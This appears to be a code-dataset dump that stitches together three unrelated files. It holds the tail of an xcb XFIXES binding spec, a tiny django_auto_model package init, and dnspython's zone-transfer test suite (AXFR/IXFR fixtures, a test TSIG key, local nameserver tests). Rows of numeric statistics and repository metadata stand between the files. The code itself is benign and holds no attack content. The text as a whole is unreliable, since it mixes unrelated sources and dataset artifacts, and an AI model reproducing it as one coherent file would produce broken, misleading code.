fn("xcb_xfixes_get_cursor_name_reply_t * xcb_xfixes_get_cursor_name_reply(xcb_connection_t *, xcb_xfixes_get_cursor_name_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("int xcb_xfixes_get_cursor_image_and_name_sizeof(const void *)")
fn("xcb_xfixes_get_cursor_image_and_name_cookie_t xcb_xfixes_get_cursor_image_and_name(xcb_connection_t *)")
fn("xcb_xfixes_get_cursor_image_and_name_cookie_t xcb_xfixes_get_cursor_image_and_name_unchecked(xcb_connection_t *)")
# ::Iterator::
fn("uint32_t * xcb_xfixes_get_cursor_image_and_name_cursor_image(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("int xcb_xfixes_get_cursor_image_and_name_cursor_image_length(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_image_and_name_cursor_image_end(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
# ::Iterator::
fn("char * xcb_xfixes_get_cursor_image_and_name_name(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("int xcb_xfixes_get_cursor_image_and_name_name_length(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_image_and_name_name_end(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("xcb_xfixes_get_cursor_image_and_name_reply_t * xcb_xfixes_get_cursor_image_and_name_reply(xcb_connection_t *, xcb_xfixes_get_cursor_image_and_name_cookie_t, xcb_generic_error_t **)") ; no_pack()
fn("xcb_void_cookie_t xcb_xfixes_change_cursor_checked(xcb_connection_t *, xcb_cursor_t, xcb_cursor_t)")
fn("xcb_void_cookie_t xcb_xfixes_change_cursor(xcb_connection_t *, xcb_cursor_t, xcb_cursor_t)")
fn("int xcb_xfixes_change_cursor_by_name_sizeof(const void *)")
fn("xcb_void_cookie_t xcb_xfixes_change_cursor_by_name_checked(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
fn("xcb_void_cookie_t xcb_xfixes_change_cursor_by_name(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
# ::Iterator::
fn("char * xcb_xfixes_change_cursor_by_name_name(const xcb_xfixes_change_cursor_by_name_request_t *)")
fn("int xcb_xfixes_change_cursor_by_name_name_length(const xcb_xfixes_change_cursor_by_name_request_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_change_cursor_by_name_name_end(const xcb_xfixes_change_cursor_by_name_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_expand_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, uint16_t, uint16_t, uint16_t, uint16_t)")
fn("xcb_void_cookie_t xcb_xfixes_expand_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, uint16_t, uint16_t, uint16_t, uint16_t)")
fn("xcb_void_cookie_t xcb_xfixes_hide_cursor_checked(xcb_connection_t *, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_hide_cursor(xcb_connection_t *, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_show_cursor_checked(xcb_connection_t *, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_show_cursor(xcb_connection_t *, xcb_window_t)")
fn("void xcb_xfixes_barrier_next(xcb_xfixes_barrier_iterator_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_barrier_end(xcb_xfixes_barrier_iterator_t)")
fn("int xcb_xfixes_create_pointer_barrier_sizeof(const void *)")
fn("xcb_void_cookie_t xcb_xfixes_create_pointer_barrier_checked(xcb_connection_t *, xcb_xfixes_barrier_t, xcb_window_t, uint16_t, uint16_t, uint16_t, uint16_t, uint32_t, uint16_t, const uint16_t *)")
fn("xcb_void_cookie_t xcb_xfixes_create_pointer_barrier(xcb_connection_t *, xcb_xfixes_barrier_t, xcb_window_t, uint16_t, uint16_t, uint16_t, uint16_t, uint32_t, uint16_t, const uint16_t *)")
# ::Iterator::
fn("uint16_t * xcb_xfixes_create_pointer_barrier_devices(const xcb_xfixes_create_pointer_barrier_request_t *)")
fn("int xcb_xfixes_create_pointer_barrier_devices_length(const xcb_xfixes_create_pointer_barrier_request_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_create_pointer_barrier_devices_end(const xcb_xfixes_create_pointer_barrier_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_delete_pointer_barrier_checked(xcb_connection_t *, xcb_xfixes_barrier_t)")
fn("xcb_void_cookie_t xcb_xfixes_delete_pointer_barrier(xcb_connection_t *, xcb_xfixes_barrier_t)")
Generate()
| 91.714286 | 199 | 0.865747 | 2,357 | 13,482 | 4.264743 | 0.039457 | 0.206825 | 0.155193 | 0.105054 | 0.968563 | 0.9615 | 0.922404 | 0.881218 | 0.826005 | 0.718464 | 0 | 0.009835 | 0.049696 | 13,482 | 146 | 200 | 92.342466 | 0.774742 | 0.0112 | 0 | 0 | 0 | 0.016667 | 0.922667 | 0.590059 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.008333 | 0 | 0.008333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
298080734959cb951fdc940222dd2057a5052224 | 180 | py | Python | django_auto_model/__init__.py | dipasqualew/django-auto-model | 958063b2df99e95f043b06f6a6df02fe8ccfb5de | [
"MIT"
] | null | null | null | django_auto_model/__init__.py | dipasqualew/django-auto-model | 958063b2df99e95f043b06f6a6df02fe8ccfb5de | [
"MIT"
] | 23 | 2020-10-29T07:02:00.000Z | 2021-08-02T06:03:29.000Z | django_auto_model/__init__.py | rolafium/Django-AutoModel | 958063b2df99e95f043b06f6a6df02fe8ccfb5de | [
"MIT"
] | null | null | null | """
DJANGO AUTO MODEL
Auto create instances of your model in your tests
"""
from django_auto_model.creator import ModelCreator
from django_auto_model.shortcuts import create_model
| 25.714286 | 52 | 0.833333 | 27 | 180 | 5.37037 | 0.518519 | 0.206897 | 0.310345 | 0.262069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122222 | 180 | 6 | 53 | 30 | 0.917722 | 0.372222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
462e3a057c31859ce21f5cc1c6b3adaa03d89dd5 | 23,376 | py | Python | tests/test_xfr.py | peterthomassen/dnspython | a328265bdfcc5c14116bb008220ab7bc25cc8264 | [
"ISC"
] | 1,666 | 2015-01-02T17:46:14.000Z | 2022-03-30T07:27:32.000Z | tests/test_xfr.py | felixonmars/dnspython | 2691834df42aab74914883fdf26109aeb62ec647 | [
"ISC"
] | 591 | 2015-01-16T12:19:49.000Z | 2022-03-30T21:32:11.000Z | tests/test_xfr.py | felixonmars/dnspython | 2691834df42aab74914883fdf26109aeb62ec647 | [
"ISC"
] | 481 | 2015-01-14T04:14:43.000Z | 2022-03-30T19:28:52.000Z | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import asyncio
import pytest
import dns.asyncbackend
import dns.asyncquery
import dns.message
import dns.query
import dns.tsigkeyring
import dns.versioned
import dns.xfr
# Some tests use a "nano nameserver" for testing. It requires trio
# and threading, so try to import it and if it doesn't work, skip
# those tests.
try:
from .nanonameserver import Server
_nanonameserver_available = True
except ImportError:
_nanonameserver_available = False
class Server(object):
pass
axfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
axfr1 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
'''
axfr2 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;ANSWER
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
base = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
"""
axfr_unexpected_origin = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 7
'''
ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 2 2 3 4 5
ns2 3600 IN A 10.0.0.4
@ 3600 IN SOA foo bar 2 2 3 4 5
@ 3600 IN SOA foo bar 3 2 3 4 5
ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 3 2 3 4 5
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
compressed_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 4 2 3 4 5
ns2 3600 IN A 10.0.0.4
ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
ixfr_expected = """@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN NS ns1
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.4
ns3 3600 IN A 10.0.0.3
"""
ixfr_first_message = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
ixfr_header = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;ANSWER
'''
ixfr_body = [
'@ 3600 IN SOA foo bar 1 2 3 4 5',
'bar.foo 300 IN MX 0 blaz.foo',
'ns2 3600 IN A 10.0.0.2',
'@ 3600 IN SOA foo bar 2 2 3 4 5',
'ns2 3600 IN A 10.0.0.4',
'@ 3600 IN SOA foo bar 2 2 3 4 5',
'@ 3600 IN SOA foo bar 3 2 3 4 5',
'ns3 3600 IN A 10.0.0.3',
'@ 3600 IN SOA foo bar 3 2 3 4 5',
'@ 3600 IN NS ns2',
'@ 3600 IN SOA foo bar 4 2 3 4 5',
'@ 3600 IN SOA foo bar 4 2 3 4 5',
]
ixfrs = [ixfr_first_message]
ixfrs.extend([ixfr_header + l for l in ixfr_body])
good_empty_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
retry_tcp_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 5 2 3 4 5
'''
bad_empty_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
unexpected_end_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 3 2 3 4 5
ns2 3600 IN A 10.0.0.4
ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
unexpected_end_ixfr_2 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
'''
bad_serial_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 2 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 4 2 3 4 5
ns2 3600 IN A 10.0.0.4
ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
ixfr_axfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
def test_basic_axfr():
z = dns.versioned.Zone('example.')
m = dns.message.from_text(axfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_basic_axfr_unversioned():
z = dns.zone.Zone('example.')
m = dns.message.from_text(axfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_basic_axfr_two_parts():
z = dns.versioned.Zone('example.')
m1 = dns.message.from_text(axfr1, origin=z.origin,
one_rr_per_rrset=True)
m2 = dns.message.from_text(axfr2, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
done = xfr.process_message(m1)
assert not done
done = xfr.process_message(m2)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_axfr_unexpected_origin():
z = dns.versioned.Zone('example.')
m = dns.message.from_text(axfr_unexpected_origin, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_basic_ixfr():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_basic_ixfr_unversioned():
z = dns.zone.from_text(base, 'example.')
m = dns.message.from_text(ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_compressed_ixfr():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(compressed_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_basic_ixfr_many_parts():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = False
for text in ixfrs:
assert not done
m = dns.message.from_text(text, origin=z.origin,
one_rr_per_rrset=True)
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_good_empty_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(good_empty_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_retry_tcp_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(retry_tcp_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1, is_udp=True) as xfr:
with pytest.raises(dns.xfr.UseTCP):
xfr.process_message(m)
def test_bad_empty_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_empty_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=3) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_serial_went_backwards_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_empty_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=5) as xfr:
with pytest.raises(dns.xfr.SerialWentBackwards):
xfr.process_message(m)
def test_ixfr_is_axfr():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(ixfr_axfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=0xffffffff) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_ixfr_requires_serial():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
with pytest.raises(ValueError):
dns.xfr.Inbound(z, dns.rdatatype.IXFR)
def test_ixfr_unexpected_end_bad_diff_sequence():
# This is where we get the end serial, but haven't seen all of
# the expected diffs
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(unexpected_end_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_udp_ixfr_unexpected_end_just_stops():
# This is where everything looks good, but the IXFR just stops
# in the middle.
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(unexpected_end_ixfr_2, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1, is_udp=True) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_ixfr_bad_serial():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_serial_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_no_udp_with_axfr():
z = dns.versioned.Zone('example.')
with pytest.raises(ValueError):
with dns.xfr.Inbound(z, dns.rdatatype.AXFR, is_udp=True) as xfr:
pass
refused = '''id 1
opcode QUERY
rcode REFUSED
flags AA
;QUESTION
example. IN AXFR
'''
bad_qname = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
not-example. IN IXFR
'''
bad_qtype = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
'''
soa_not_first = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
bar.foo 300 IN MX 0 blaz.foo
'''
soa_not_first_2 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 300 IN MX 0 blaz.foo
'''
no_answer = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ADDITIONAL
bar.foo 300 IN MX 0 blaz.foo
'''
axfr_answers_after_final_soa = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
ns3 3600 IN A 10.0.0.3
'''
def test_refused():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(refused, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.xfr.TransferError):
xfr.process_message(m)
def test_bad_qname():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_qname, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_bad_qtype():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_qtype, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_soa_not_first():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(soa_not_first, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
m = dns.message.from_text(soa_not_first_2, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_no_answer():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(no_answer, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_axfr_answers_after_final_soa():
z = dns.versioned.Zone('example.')
m = dns.message.from_text(axfr_answers_after_final_soa, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
keyring = dns.tsigkeyring.from_text(
{
'keyname.': 'NjHwPsMKjdN++dOfE5iAiQ=='
}
)
keyname = dns.name.from_text('keyname')
def test_make_query_basic():
z = dns.versioned.Zone('example.')
(q, s) = dns.xfr.make_query(z)
assert q.question[0].rdtype == dns.rdatatype.AXFR
assert s is None
(q, s) = dns.xfr.make_query(z, serial=None)
assert q.question[0].rdtype == dns.rdatatype.AXFR
assert s is None
(q, s) = dns.xfr.make_query(z, serial=10)
assert q.question[0].rdtype == dns.rdatatype.IXFR
assert q.authority[0].rdtype == dns.rdatatype.SOA
assert q.authority[0][0].serial == 10
assert s == 10
with z.writer() as txn:
txn.add('@', 300, dns.rdata.from_text('in', 'soa', '. . 1 2 3 4 5'))
(q, s) = dns.xfr.make_query(z)
assert q.question[0].rdtype == dns.rdatatype.IXFR
assert q.authority[0].rdtype == dns.rdatatype.SOA
assert q.authority[0][0].serial == 1
assert s == 1
(q, s) = dns.xfr.make_query(z, keyring=keyring, keyname=keyname)
assert q.question[0].rdtype == dns.rdatatype.IXFR
assert q.authority[0].rdtype == dns.rdatatype.SOA
assert q.authority[0][0].serial == 1
assert s == 1
assert q.keyname == keyname
def test_make_query_bad_serial():
z = dns.versioned.Zone('example.')
with pytest.raises(ValueError):
dns.xfr.make_query(z, serial='hi')
with pytest.raises(ValueError):
dns.xfr.make_query(z, serial=-1)
with pytest.raises(ValueError):
dns.xfr.make_query(z, serial=4294967296)
def test_extract_serial_from_query():
z = dns.versioned.Zone('example.')
(q, s) = dns.xfr.make_query(z)
xs = dns.xfr.extract_serial_from_query(q)
assert s is None
assert s == xs
(q, s) = dns.xfr.make_query(z, serial=10)
xs = dns.xfr.extract_serial_from_query(q)
assert s == 10
assert s == xs
q = dns.message.make_query('example', 'a')
with pytest.raises(ValueError):
dns.xfr.extract_serial_from_query(q)
class XFRNanoNameserver(Server):
def __init__(self):
super().__init__(origin=dns.name.from_text('example'))
def handle(self, request):
try:
if request.message.question[0].rdtype == dns.rdatatype.IXFR:
text = ixfr
else:
text = axfr
r = dns.message.from_text(text, one_rr_per_rrset=True,
origin=self.origin)
r.id = request.message.id
return r
except Exception:
pass
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_sync_inbound_xfr():
with XFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
async def async_inbound_xfr():
with XFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_asyncio_inbound_xfr():
dns.asyncbackend.set_default_backend('asyncio')
async def run():
await async_inbound_xfr()
try:
runner = asyncio.run
except AttributeError:
# this is only needed for 3.6
def old_runner(awaitable):
loop = asyncio.get_event_loop()
return loop.run_until_complete(awaitable)
runner = old_runner
runner(run())
#
# We don't need to do this as it's all generic code, but
# just for extra caution we do it for each backend.
#
try:
import trio
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_trio_inbound_xfr():
dns.asyncbackend.set_default_backend('trio')
async def run():
await async_inbound_xfr()
trio.run(run)
except ImportError:
pass
try:
import curio
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_curio_inbound_xfr():
dns.asyncbackend.set_default_backend('curio')
async def run():
await async_inbound_xfr()
curio.run(run)
except ImportError:
pass
class UDPXFRNanoNameserver(Server):
def __init__(self):
super().__init__(origin=dns.name.from_text('example'))
self.did_truncation = False
def handle(self, request):
try:
if request.message.question[0].rdtype == dns.rdatatype.IXFR:
if self.did_truncation:
text = ixfr
else:
text = retry_tcp_ixfr
self.did_truncation = True
else:
text = axfr
r = dns.message.from_text(text, one_rr_per_rrset=True,
origin=self.origin)
r.id = request.message.id
return r
except Exception:
pass
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_sync_retry_tcp_inbound_xfr():
with UDPXFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
async def udp_async_inbound_xfr():
with UDPXFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_asyncio_retry_tcp_inbound_xfr():
dns.asyncbackend.set_default_backend('asyncio')
async def run():
await udp_async_inbound_xfr()
try:
runner = asyncio.run
except AttributeError:
def old_runner(awaitable):
loop = asyncio.get_event_loop()
return loop.run_until_complete(awaitable)
runner = old_runner
runner(run())
